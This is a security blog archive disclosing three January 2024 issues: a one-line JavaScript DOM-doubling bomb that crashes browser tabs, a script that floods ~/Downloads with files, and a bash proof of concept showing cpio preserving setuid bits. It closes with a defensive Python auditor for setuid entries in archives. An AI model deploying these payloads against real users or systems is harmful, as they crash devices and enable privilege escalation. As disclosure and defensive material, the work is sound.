January 2024 Archives
Thu 25 Jan 2024 10:50:26 AM EET
Yet another fork()/malloc() bomb in javascript + SIGILL in Chrome
Searching the web for "javascript fork malloc bomb" returns prior results, e.g. here: and here:
We got a javascript fork/malloc bomb which crashed Chrome 121 on linux with SIGILL, and in about one in five runs the virtual machine froze. SIGILL almost always is a sign of memory corruption :) On android it crashes the current tab without explanation. Firefox 121 on linux also crashes the current tab.
In all cases except the sporadic freezes, the browser remains functioning, not counting the crashed tab.
The javascript code is simply simple:
====
setInterval("document.body.innerHTML += document.body.innerHTML", 1);
====
Online demo: in case someone wants to test it on other browsers or debug it.
The GNU/linux tests took about 1.5 minutes in a virtual machine with 4GB RAM and single core.
Thu 18 Jan 2024 11:37:09 AM EET
Minor firefox DoS - semi silently polluting ~/Downloads with files (part 2)
Tested on: firefox 121 and chrome 120 on GNU/linux
Date: Thu Jan 18 08:38:28 AM UTC 2024
This is barely a DoS, but since it might affect Chrome too we decided to disclose it.
If a firefox user visits a specially crafted page, then firefox may create many files in ~/Downloads. The user is notified about this in a small dialog, but there is no option to stop the downloads. The potential denial of service is that the user must manually delete the created files, which might be a PITA, especially on a phone.
The code basically is:
====
URL = "data:text/plain;,a"; // can be very large with no net traffic
link = document.createElement('a');
link.href = URL;
link.download = 'joro_';
document.body.appendChild(link);
function f() {
  if (!confirm("This will ruin your device with probability up to 199.99%")) return;
  setInterval("link.click();", 1); // good
}
f();
====
There is no network traffic, and in about 90 seconds firefox 121 created 3434 files, at about 38 files/second.
google chrome 120 prompts about multiple downloads, and if the user allows it, it creates files at 4.2 files/second, but it shows modal prompts which we couldn't close from the GUI, so we had to kill the process.
Test online: check if you are vulnerable
– guninski
Mon 08 Jan 2024 10:57:17 AM EET
cpio privilege escalation via setuid files in cpio archive
Happy New Year, let in 2024 happiness be with you! :)
When extracting archives, cpio (at least version 2.13) preserves the setuid flag, which might lead to privilege escalation.
One example: r00t extracts an archive to /tmp/, and scidiot then runs the setuid /tmp/micq/backd00r it contained, without further interaction from root.
We believe this is a vulnerability, since directory traversal in cpio is considered a vulnerability.
The POC is trivial; the bash script follows.
====
#!/bin/bash
# cpio privilege escalation via setuid files in cpio archive
# author: Georgi Guninski
# date: Mon Jan 8 07:28:28 AM UTC 2024
# tested on cpio (GNU cpio) 2.13
mkdir -p /tmp/1
cd /tmp/1
touch a
chmod 4555 a
echo -n a | cpio -ocv0 > a.cpio
mkdir -p /tmp/2
cd /tmp/2
cpio -iv < ../1/a.cpio
ls -lh /tmp/2/a
#-r-sr-xr-x. 1 joro joro 0 Jan 8 09:10 /tmp/2/a
====
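The defensive counterpart to the POC above is to audit an archive for setuid/setgid entries before a privileged user extracts it. The following is an added example, not the author's code and not part of GNU cpio: it parses the "newc" (SVR4 portable ASCII) format that `cpio -oc` writes, walks the entries up to the TRAILER!!! record, and reports every entry whose mode carries S_ISUID or S_ISGID. The sample archive is constructed in memory to mirror the POC (an empty file `a` with mode 4555 plus a benign file); the entry builder exists only to make the example self-contained.

```python
# Pre-extraction audit of a cpio "newc" archive: list every entry that would
# be extracted with the setuid or setgid bit set. Added example, not the
# author's code; the archive below is constructed, not taken from the page.
import stat

NEWC_MAGIC = b"070701"      # magic of the format GNU cpio writes for -c / -H newc
HEADER_LEN = 110            # 6-byte magic + 13 fields of 8 ASCII hex digits


def _pad4(n: int) -> int:
    """Bytes needed to round n up to a multiple of 4 (newc aligns name and data)."""
    return (4 - n % 4) % 4


def newc_entry(name: str, mode: int, data: bytes = b"", ino: int = 1) -> bytes:
    """Serialise one newc entry (used only to construct the sample archive)."""
    name_b = name.encode() + b"\0"
    # ino, mode, uid, gid, nlink, mtime, filesize, devmajor, devminor,
    # rdevmajor, rdevminor, namesize, check
    fields = [ino, mode, 0, 0, 1, 0, len(data), 0, 0, 0, 0, len(name_b), 0]
    out = NEWC_MAGIC + b"".join(b"%08x" % f for f in fields) + name_b
    out += b"\0" * _pad4(len(out))          # header+name padded to 4 bytes
    return out + data + b"\0" * _pad4(len(data))


def iter_newc(archive: bytes):
    """Yield (name, mode, data) for each entry up to the TRAILER!!! record."""
    pos = 0
    while pos + HEADER_LEN <= len(archive):
        if archive[pos:pos + 6] != NEWC_MAGIC:
            raise ValueError(f"not a newc header at offset {pos}")
        fields = [int(archive[pos + 6 + 8 * i:pos + 14 + 8 * i], 16) for i in range(13)]
        mode, filesize, namesize = fields[1], fields[6], fields[11]
        name_start = pos + HEADER_LEN
        name = archive[name_start:name_start + namesize - 1].decode()  # drop NUL
        if name == "TRAILER!!!":
            return
        data_start = name_start + namesize + _pad4(HEADER_LEN + namesize)
        data = archive[data_start:data_start + filesize]
        yield name, mode, data
        pos = data_start + filesize + _pad4(filesize)
    raise ValueError("archive ended without a TRAILER!!! record")


def risky_entries(archive: bytes):
    """Entries whose mode has S_ISUID or S_ISGID set, as (name, octal perms)."""
    return [(name, oct(mode & 0o7777))
            for name, mode, _ in iter_newc(archive)
            if mode & (stat.S_ISUID | stat.S_ISGID)]


def build_sample_archive() -> bytes:
    """Constructed sample mirroring the POC: empty setuid file 'a' plus a benign file 'b'."""
    return (newc_entry("a", stat.S_IFREG | 0o4555)            # what `chmod 4555 a` produced
            + newc_entry("b", stat.S_IFREG | 0o644, b"hello", ino=2)
            + newc_entry("TRAILER!!!", 0))


if __name__ == "__main__":
    for name, perms in risky_entries(build_sample_archive()):
        print(f"WARNING: {name} would be extracted with mode {perms}")
```

Running the audit on the sample flags only `a` with permissions `0o4555`. On a real archive, pass the file's bytes to `risky_entries` before handing it to `cpio -i` as root; after the fact, `find /tmp/2 -perm /6000` lists anything that was extracted with either bit set so it can be reviewed or chmod'ed.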